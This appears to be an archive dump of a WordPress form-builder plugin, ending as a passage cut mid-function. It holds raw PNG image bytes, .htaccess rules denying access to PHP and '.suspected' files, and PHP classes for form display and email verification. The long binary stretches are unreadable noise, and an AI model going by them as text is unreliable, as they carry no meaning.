:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�:0iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-19T12:29:19+04:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-11-19T12:29:19+04:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-11-19T12:29:19+04:00</xmp:ModifyDate>
         <xmpMM:InstanceID>xmp.iid:b23cfe52-1ed7-bd44-98a9-4ec4bea3cf73</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:910f0c91-8e97-11e5-9083-e9f04772f1a0</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:56a353f2-c54a-8242-937e-becc11c12ac3</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:56a353f2-c54a-8242-937e-becc11c12ac3</stEvt:instanceID>
                  <stEvt:when>2015-11-19T12:29:19+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:b23cfe52-1ed7-bd44-98a9-4ec4bea3cf73</stEvt:instanceID>
                  <stEvt:when>2015-11-19T12:29:19+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>28</exif:PixelXDimension>
         <exif:PixelYDimension>28</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�� cHRMz%������u0�`:�o�_�F~IDATx�b|Z�@m��@0j�P7���W���MQS�UVQ����#�^�b}�&�y�2q�p�����w唄S��E�U4~ݽA�Ky�ܠ��<BɅp���)	�2��C��6.$x�݂��~A6�UV�URV8�n���/��U;#�lʦ�*�\���5������xx�����ϛ���u�"�����#�a�|&HR���~;����Ȃ��~~7������?����*����?���Hf93��^�2�闰�h��ߏo��}ŚΈ5�MN	-�����vFZ:cSR#�P��|&>D�;�׃;��GKB	�$�����-�};y������
A����������MY�۱}���&-G�������%��P�1�IEND�B`�images/refresh1.png000060400000001105152434416630010237 0ustar00�PNG


IHDR�Y�=tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b��,���x۷�o���31��,��s�����?��@M��}����_�]����?AwI�>c65>&
��{��?o~�ǴP���Q�-I���ŏ��G~y��7�ce|����?�̓(�ٙXQ}'��8˜
�	�}�g�ӿp�	&lw�&���U�3mq��c�Y����>�s*�L���5���g��NTf�1b��ey����P�+�Y!����&F�	�l�j��nc��� ���43\B��q�-��3��A΂�"�?�EJ�|���0��E��8�xX@�{��0C�֧V;���a��;�PnF{q&�=�W�y�Y50H
����?H/+c�
�[/�����:H�����
LK��C�͈���״[���:�R��I2���
B��aȖ6�U�H0ϱ`�`�H���q���w���Y[�)V�%G���	G��	�@��� �Ψ���c0~��2�IEND�B`�images/logo.png000060400000013313152434416630007464 0ustar00�PNG


IHDRXD���gAMA���atEXtSoftwareAdobe ImageReadyq�e<]IDATx^�\	tU�uM3�i��i��i�VӤ�j�)�������xՎcf2؀� 3O6��`�
!@�$�@HhB����&$�1������'�?J&]��Jk�޻�{���sϽ���]]t1��@�p8����ݓ'O������]�����t����K1���?9w�ܷ����D��E.\8څH�
Q@nv��7N�>}�͛7�<�d�\Vx��ŋ�K�.��O?ŵk�bB���W���+W���x��}�u4��}}�8r�̙G�;JrEEş�ܧ9
�"�Gt{����B�0|�ĩS�7��!�
Ӟxv략����D��+�q��B�vGH�P�%��轆��U㍍�8q��-���ǏG}}=��ꌣ�U~�m~�đ�g��&�3*�f�
��ٝ��M��芈[�u��(,,��Ç
�n����P+ٷ���$��7If<�A:ӷ
�����Ă�$��B�p���C�N'RSS�l�2̛73f��i�0k�,�Z�
iii(--EUU�)���
tP��B+��H`�_1E#!�>+4(G�����0q�D�:e�Albb"^}�U�3Æ�ԩS�!)	��������zb��Р���Īc��
���b�W�r�$�>�`��7�xxc�<Zu�xNNƏ����c�bҤI���=q��N�=���u����ѣ���i��i�s$���!*OH�1j�ƶAij��FS��xv�#=�A����/�ꎡ�xNDCC=Â�F�BBB
z�>:��O>����%{�Q�0�1|������ԭ)p9�8^,�m�n�� �uP��CҞj|�+Xv��5��q0�����zӾj��u���asZdjsOV
jنt�~�+LD�`Ά~3eQ�Lr��ٜ��+Avnqr��0}�lt����s�����{}�<�;�߃;��z%`��_��{��G��q�]=p�}�a�k�شe2�
"�=B}v��#fb�e=����c�y0rvy^��)����ûɕ>3�Y����j�A���#��9�sV{Q�#�^�Aěi�A��+�0P�<�
�ؐ������rOO�`r�I�O֋�v����‚�k���þ�e��k��G/,]�y�5�1 a�u��~�m�v� <��;x�=!�J��ײ��S���]���¨��Q�3=x3	&9�6Tb�����^��{�~����x�|X�8(3Wz���
���Q	f��\͆"V���r{�pu~�R)��v��{^t���λ�&i�0nl"|�K���wy��^�>}~�m�ٌ�W��]��ѓ{ុ��On
\��C�ض��ݾ����N�Nq��*�֙6�J�����3�!I]�����'�����f�1vA9	�&����ֆڜ���l��>�K4�)&謡L�N`���\%�V�����a_��/:���6��Hb/��Ǒu���^��u�95�=�,X����f8��8X�7b��$�'n���D�����?���v�xl�k���"X�0Ag�M�2sr9v���� x�}_(�?�޽")����$��f��ӌ�WPRz�����rY>{v2�)��w*�����$����bS`�3�	r�FE�`7���EyE-�%y�{�|zpNۃg҃�lC��U��\N)�J0+&Ћ��ҸC���.��Ò�v�G�/�H���@n�Y��3�f�y4��.����Ĉm�98����	�x�#f�I��Cy>l���oO-�n�bHb�}��.N�n�eW�7�
Ʌ�3Å�+<p���6������-6	��j6��Pc��X!�A������q�42��Q�q�3��~�i���g�)l�z�V�/�C���$8v�P��f�i[�Xǧ�`nVm��j�J���d&R�T�*��I��hY5������m�`�-i��U��{Cu[m�S�?�a����u���`݆Fl�ք��'�5�$R�&lNiB��&l�Ԅ?>�is<�x`��{��`��Z��D}XV�{"F�hu�SF�Ն�#�`��F��E'Yk���"	&�~s��ܗ^��d'/�L��Aަ-��p��������]����h��6ɵG��c �ˢ�i�~{Ě��V0�$�A�on/v��~/2�b��8��m0�ݲ5���=z[)�V�H_�Ԉ�Kj�ԘL�~�PH�U��Et��X!�Y�T-���&X��:�.wy�4�d�S�Q����:l�g�H��mŽ6�DkV�{ǿ^��C��gTad�g��J/���-6)+~@;L�4�q	�����q�	f�{T�x�����$�@�c�I��݆�;���u�xky������E�"�-��{p8���5(uT�`^%�T"�H�@�󊫸J��J��P��l+�GTY{�&\.ypq�B��cg)��Z��+�k��7�JzgRr��<�]{ع�C�I�Y{k�5`ۮJ��6/�܏�Fg���\�=M���0�#L{*i[J��-wc�"7&/��B��7T��V���֧L�y�M���Rv��RL~�釽��k���@��J��M�?��{+k����׀Uk��ުjl�|��F�\�y�w��?���_ݏ��i]�Ycp8��-3��M�3$�:�Q���"���c1	���iu@c��z��W���m�K�.��Ԉ?ee%�TT3.��٘0�0&L���i����G
��˹_�Ņ����v��v`����F��\I��|!6UUl�:V�ě���:"҃9�,r��a�;Ep�����K$)�z_��E�������{O~?#��.
�Vg�fs�/'M���l�$�S\<υ
I4!}v�LR�m>�^/ҳ;|rs
}\�3|C��X�F�#	f�_#�_+�ܗqw��b<���Y\�vB���2�x�YXP�e�W���c���F��Vf�o��\|����&,Z��F��?s����V��>$���-��s]xq^�`�~�AA���0y������_#���ͯ	��mLr1�Mk�[kJP]S�ˆ��~��04�fff��w�����ҳ�k��7��rA����ًyG�xrR!�p법`_E�=�+#����r|��󰊺��W����G��0�D�\Fzp{���T��{l�r0�M�*�SRR��3���"9r$���g���������`�b#��Gp�����)�g�K0+$��_n���ǀ�0=���J1����YN�a��i�<T��/�+�X�ۜ�4Fz����X���	~%�\��c�y9z����$˹x�"���J���ƼU�3U��LS�u��^�A��ף�ƍ�O�<�o/�Ő!C���
�ǒQ{��p_���H���H��
kkZ9����ԥ.���s ��m��5%�F����NI�����x�..-��vڙ�;0ur
��f�i}�rgZ,�u��ϴ��E!�O���s�bZ�ؘ�	�M'y�\��f�v��i���$�[��.ucW&S��6[dO9��ۍ�.qb�B'&��9���k��/��Q��y��l%��sUA�?	�r*��+v[YJJJB�/u�2޳�l􅏩T�u�r�1!��Ծ�e�N��N�Gl0m�xdW9l�r��;��A��%��"�$X�2�-~_��q;�oǦ�dlذ�|������Ϯ��lǎػw/8�C�PHЗ>����G)�>M�4�iғ��a��������۷��oڬ$k�ng��l8�$���
��Hעz0+���*����ବ,�������7��yyyF����/��0���`y��KN�jG�P}����>���C��d�ˍ�4f�rbڻN��΁t���BA�����L��t�޶WF
���H� u�|�E�H�bB��i��f8��Gɫ-A�}k�й�Om;Ip�n^_���E��Nu/]�Bn!	�1٧y�}�O��ӬK�q�W�������@P���݅�byO碸��8��hQ	��&��?�Z<J�����.���R���H��eN�s.�֙�;O�	q�y,ƒE0+���J���H��Ģ��\"u���M�6��4-�d�c�.4D�`�9���R��RF<�-bQL^&o�u '_�Q�/A���6ɉ`�o�v�ع<�B8���p��evۖ1��H�Fp`��������Aɵ��:�I0�#��J�n�1Dذ���+�݅f��^�&=�L[ɕɛ�1�Gzp4���mX��n�ߗ�삕����&�h%�k�P���'��o����ee6��p0��d���|Cg�Z�)Qh�`�L`��8�).��b�*��bф���v�qa.�y�V���Ǯc`��@�nT����77Y>K�]u`n�)�y�B���z�.Vy�޸so�����iеIx�{)�L�?D�����<���(ƒ�!"�3�S��V|��i�'����*�d�^�E�A�7�ɸ���~�5�M�U�e/c�5�q�Lec���R��;�������I��M�v�)h���'v���dt��j�
zu�ui`�w{�˚��F{�C�X�����E}l���Ow�1g)_J��{����'��=��?��*)����(�!.�r��$�O��m%�;?=��g�,#��<������O����Ƴ1�~=I"��m��;�w���qef�PuƔ����X�6���wy�g��0��h&n�gzb����������8�����2�V��H���l�f���U�w(��,{�e�){"�l������`�ѐZ���x]��)�X��叟G}�
~�NDS�2�h�|���ܘ��J��1�H�S��_���m+��s�f�y�;�ۇ�ư���_Sf�x����C���+Rt��Qn�[��'��o��ʳX�8?�)�X�"�c�T��*	X͋)��|,��%/of�4��[I��l�˦����A��j�����ŒՓH�wX7"�'��X�*'�wS���Uw��t���ʓ�o��F����jr8O氡������ \��d�{���5��'�C¼P������N'�B��YO���WY� �K�P����\V(��[Ou,&���7�]"o��sV��J#G�0�^p�=Ŋ���3���OI�p�َ&�g����Gr`[�	�����=y�=�>c��.��_u@���`��y��ē����D���U��!�0ı㾨�ƛҸ3z��g�!#E#�<κW{ȁ
��k��7�#LycV6l��������6����L��7����S:@�3����IR���,�#�<�+����U=��'Ng-�D}�5i�cXa4+n��S�@k�E�~LJX_�qQa�Ijd�*��X�*>��zȺ�eJ��)~S���#�
I�N�<�Ayez
��f���4���C�+h���t0ْ(Nje;�wc_wR��]I;R�����cڬ�����t�_�|#�
��_��X�`��J�%P�â��`4���+^�|4���U|����ۨ{��9Q�U:�v��z0��Gp0ݔO!1�� �S�/�G��Y��g����VX�����Rc��I�W�Q�h��x^�Ҁ
��u�5��&9�`�D���i�k�6�%+;��-�z”2Z�2ݣʘ��Q�;G텩��]t1���J����IEND�B`�frontend/controllers/.htaccess000044400000000424152434416630012535 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>frontend/controllers/FMControllerForm_maker_fmc.php000060400000005346152434416630016654 0ustar00<?php

class FMControllerForm_maker_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute($id) {
    return $this->display($id);
  }

  public function display($id) {
    if (session_id() == '' || (function_exists('session_status') && (session_status() == PHP_SESSION_NONE))) {
      @session_start();
    }
    require_once WD_FMC_DIR . "/frontend/models/FMModelForm_maker_fmc.php";
    $model = new FMModelForm_maker_fmc();

    require_once WD_FMC_DIR . "/frontend/views/FMViewForm_maker_fmc.php";
    $view = new FMViewForm_maker_fmc($model);

    return $view->display((int)$id);
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}frontend/controllers/FMControllerVerify_email_fmc.php000060400000006007152434416630017200 0ustar00<?php

class FMControllerVerify_email_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct() {
	}
	////////////////////////////////////////////////////////////////////////////////////////
	// Public Methods                                                                     //
	////////////////////////////////////////////////////////////////////////////////////////
	public function execute() {
		return $this->display();
	}

	public function display() {
		$gid = (int)((isset($_GET['gid']) && esc_html($_GET['gid']) != '') ? esc_html($_GET['gid']) : 0);
		$hashInfo = ((isset($_GET['h']) && esc_html($_GET['h']) != '') ? esc_html($_GET['h']) : 0);
		$hashInfo = explode("@",$hashInfo);
		
		$md5 = $hashInfo[0];
		$recipiend = isset($hashInfo[1]) ? $hashInfo[1] : '';	

		if($gid <= 0  or strlen($md5) <= 0 or strlen($recipiend) <= 0)
			return;

		require_once WD_FMC_DIR . "/frontend/models/FMModelVerify_email_fmc.php";
		$model = new FMModelVerify_email_fmc();
		$result = $model->setValidation($gid,$md5,$recipiend);
		if($result!==NULL) {	
			require_once WD_FMC_DIR . "/frontend/views/FMViewVerify_email_fmc.php";
			$view = new FMViewVerify_email_fmc($model);
			$view->display($result);
		}
	}
	////////////////////////////////////////////////////////////////////////////////////////
	// Getters & Setters                                                                  //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Private Methods                                                                    //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Listeners                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
}frontend/views/FMViewVerify_email_fmc.php000060400000004516152434416630014561 0ustar00<?php

class FMViewVerify_email_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	private $model;

	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct($model) {
		$this->model = $model;
	}
	////////////////////////////////////////////////////////////////////////////////////////
	// Public Methods                                                                     //
	////////////////////////////////////////////////////////////////////////////////////////
	public function display($result) {
		echo WDW_FMC_Library::message($result, 'warning', 0);
	}
  
	////////////////////////////////////////////////////////////////////////////////////////
	// Getters & Setters                                                                  //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Private Methods                                                                    //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Listeners                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
}frontend/views/.htaccess000044400000000424152434416630011324 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>frontend/views/FMViewForm_maker_fmc.php000060400001167714152434416630014243 0ustar00<?php

class FMViewForm_maker_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display($id) {
	$fmc_settings = get_option('fmc_settings');
    $current_url=htmlentities($_SERVER['REQUEST_URI']);
    $form_maker_front_end = "";
	$pattern = '/\/\/(.+)(\r\n|\r|\n)/';
    $result = $this->model->showform($id);
    if (!$result) {
      return;
    }
    $ok = $this->model->savedata($result[0], $id);
    if (is_numeric($ok)) {
      $this->model->remove($ok);
    }
    $row = $result[0];
    $label_id = $result[2];
    $label_type = $result[3];
    $form_theme = $result[4];
    
    $old = FALSE;
    if (isset($_SESSION['form_submit_type' . $id])) {
      $type_and_id = $_SESSION['form_submit_type' . $id];
      $type_and_id = explode(',', $type_and_id);
      $form_get_type = $type_and_id[0];
      $form_get_id = isset($type_and_id[1]) ? $type_and_id[1] : '';
      $_SESSION['form_submit_type' . $id] = 0;
      if ($form_get_type == 3) {
        $_SESSION['massage_after_submit' . $id] = "";
        $after_submission_text = $this->model->get_after_submission_text($form_get_id);
        require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
        $form_maker_front_end .=  WDW_FMC_Library::message(wpautop(html_entity_decode($after_submission_text)), 'warning', $id);
        return $form_maker_front_end;
      }
    }
    if (isset($_SESSION['redirect_paypal' . $id]) && ($_SESSION['redirect_paypal' . $id] == 1)) {
      $_SESSION['redirect_paypal' . $id] = 0;
      if (isset($_GET['succes'])) {
        require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
        if ($_GET['succes'] == 0) {
          $form_maker_front_end .=  WDW_FMC_Library::message(__('Error, email was not sent.', 'form_maker'), 'error', $id);
        }
        else {
          $form_maker_front_end .=  WDW_FMC_Library::message(__('Your form was successfully submitted.', 'form_maker'), 'warning', $id);
        }
      }
    }
    elseif (isset($_SESSION['massage_after_submit' . $id]) && $_SESSION['massage_after_submit' . $id] != "") {
      $message = $_SESSION['massage_after_submit' . $id];
      $_SESSION['massage_after_submit' . $id] = "";        
      if ($_SESSION['error_or_no' . $id]) {
        $error = 'error';
      }
      else {
        $error = 'warning';
      }
      require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
      $form_maker_front_end .=  WDW_FMC_Library::message($message, $error, $id);
    }
    
    if (isset($_SESSION['show_submit_text' . $id])) {
      if ($_SESSION['show_submit_text' . $id] == 1) {
        $_SESSION['show_submit_text' . $id] = 0;
        $form_maker_front_end .= $row->submit_text;
        return;
      }
    }
    $this->model->increment_views_count($id);
    if (isset($row->form)) {
			$old = TRUE;
    }
    $article = $row->article_id;
      
      $form_maker_front_end .= '<script type="text/javascript">' . preg_replace($pattern, ' ', $row->javascript) . '</script>';
      $new_form_theme = explode('{', $form_theme);
      $count_after_explod_theme = count($new_form_theme);
      for ($i = 0; $i < $count_after_explod_theme; $i++) {
        $body_or_classes[$i] = explode('}', $new_form_theme[$i]);
      }
      for ($i = 0; $i < $count_after_explod_theme; $i++) {
        if ($i == 0) {
          $body_or_classes[$i][0] = ".form" . $id . ' ' . str_replace(',', ", .form" . $id, $body_or_classes[$i][0]);
        }
        else {
          $body_or_classes[$i][1] = ".form" . $id . ' ' . str_replace(',', ", .form" . $id, $body_or_classes[$i][1]);
        }
      }
      for ($i = 0; $i < $count_after_explod_theme; $i++) {
        $body_or_classes_implode[$i] = implode('}', $body_or_classes[$i]);
      }
      $form_theme = implode('{', $body_or_classes_implode);
	  $form_theme = preg_replace($pattern, ' ', $form_theme);
      $form_maker_front_end .= '<style>' . str_replace('[SITE_ROOT]', WD_FMC_URL, $form_theme) . '</style>';
      wp_print_scripts('main' . (($old == false || ($old == true && $row->form=='')) ? '_div' : '') . '_front_end', WD_FMC_URL . '/js/main' . (($old == false || ($old == true && $row->form=='')) ? '_div' : '') . '_front_end.js?ver='. get_option("wd_form_maker_version"));
      $form_currency = '$';
      $check_js = '';
      $onload_js = '';
      $onsubmit_js = '';
      $currency_code = array('USD', 'EUR', 'GBP', 'JPY', 'CAD', 'MXN', 'HKD', 'HUF', 'NOK', 'NZD', 'SGD', 'SEK', 'PLN', 'AUD', 'DKK', 'CHF', 'CZK', 'ILS', 'BRL', 'TWD', 'MYR', 'PHP', 'THB');
      $currency_sign = array('$', '&#8364;', '&#163;', '&#165;', 'C$', 'Mex$', 'HK$', 'Ft', 'kr', 'NZ$', 'S$', 'kr', 'zl', 'A$', 'kr', 'CHF', 'Kc', '&#8362;', 'R$', 'NT$', 'RM', '&#8369;', '&#xe3f;');
      if ($row->payment_currency) {
        $form_currency =	$currency_sign[array_search($row->payment_currency, $currency_code)];
      }
      $form_paypal_tax = $row->tax;
      $form_maker_front_end .= '<form name="form' . $id . '" action="' . $current_url . '" method="post" id="form' . $id . '" class="form' . $id . '" enctype="multipart/form-data"  onsubmit="check_required(\'submit\', \'' . $id . '\'); return false;">
      <div id="' . $id . 'pages" class="wdform_page_navigation" show_title="' . $row->show_title . '" show_numbers="' . $row->show_numbers . '" type="' . $row->pagination . '"></div>
      <input type="hidden" id="counter' . $id . '" value="' . $row->counter . '" name="counter' . $id . '" />
      <input type="hidden" id="Itemid' . $id . '" value="" name="Itemid' . $id . '" />';
    if ($old == FALSE || ($old == TRUE && $row->form == '')) {
      $is_type = array();
      $id1s = array();
      $types = array();
      $labels = array();
      $paramss = array();
      $required_sym = $row->requiredmark;
      $fields = explode('*:*new_field*:*', $row->form_fields);
      $fields = array_slice($fields,0, count($fields) - 1);   
      foreach ($fields as $field) {
        $temp = explode('*:*id*:*', $field);
        array_push($id1s, $temp[0]);
        $temp = explode('*:*type*:*', $temp[1]);
        array_push($types, $temp[0]);
        $temp = explode('*:*w_field_label*:*', $temp[1]);
        array_push($labels, $temp[0]);
        array_push($paramss, $temp[1]);
      }
      $form_id = $id;	
      
      $show_hide	= array();
	$field_label	= array();
	$all_any 	= array();
	$condition_params 	= array();
	$type_and_id = array();

	$condition_js='';
	if($row->condition!="")
	{
		$conditions=explode('*:*new_condition*:*',$row->condition);
		$conditions 	= array_slice($conditions,0, count($conditions)-1); 
		$count_of_conditions = count($conditions);					

		foreach($conditions as $condition)
		{
			$temp=explode('*:*show_hide*:*',$condition);
			array_push($show_hide, $temp[0]);
			$temp=explode('*:*field_label*:*',$temp[1]);
			array_push($field_label, $temp[0]);
			$temp=explode('*:*all_any*:*',$temp[1]);
			array_push($all_any, $temp[0]);
			array_push($condition_params, $temp[1]);
		}

		foreach($id1s as $id1s_key => $id1)
		{	
			$type_and_id[$id1]=$types[$id1s_key];
		}
		
		
		for($k=0; $k<$count_of_conditions; $k++)
		{	
			if($show_hide[$k])
			{
				$display = 'removeAttr("style")';
				$display_none = 'css("display", "none")';
			}
			else
			{
				$display = 'css("display", "none")';
				$display_none = 'removeAttr("style")';
			}

			if($all_any[$k]=="and")
				$or_and = '&&';
			else
				$or_and = '||';
				
		
				if($condition_params[$k])
				{
					$cond_params =explode('*:*next_condition*:*',$condition_params[$k]);
					$cond_params 	= array_slice($cond_params,0, count($cond_params)-1); 
					for($l=0; $l<count($cond_params); $l++)
					{
						$params_value = explode('***',$cond_params[$l]);
						if(!isset($type_and_id[$params_value[0]]))
							unset($cond_params[$l]);
					}
					$cond_params = array_values($cond_params);
					
					$if = '';
					$keyup = '';
					$change = '';
					$click = '';
					
					for($m=0; $m<count($cond_params); $m++)
					{
						$params_value = explode('***',wp_specialchars_decode($cond_params[$m], 'single'));
						switch($type_and_id[$params_value[0]])
						{
							case "type_text":
							case "type_password":
							case "type_textarea":
							case "type_number":
							case "type_submitter_mail":	
							case "type_spinner":
							    if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 ';
								}
								else
								{
									if($params_value[1] == "=" || $params_value[1] == "!")
									{
										$params_value[2] = "";
										$params_value[1] = $params_value[1]."=";						
									}		
									$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" ';
								}
								
								$keyup .= '#wdform_'.$params_value[0].'_element'.$form_id.', ';	
								if($type_and_id[$params_value[0]] == "type_spinner")
									$click .= '#wdform_'.$params_value[0].'_element'.$form_id.' ~ a, ';
							break;
							
							case "type_name":	
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{	
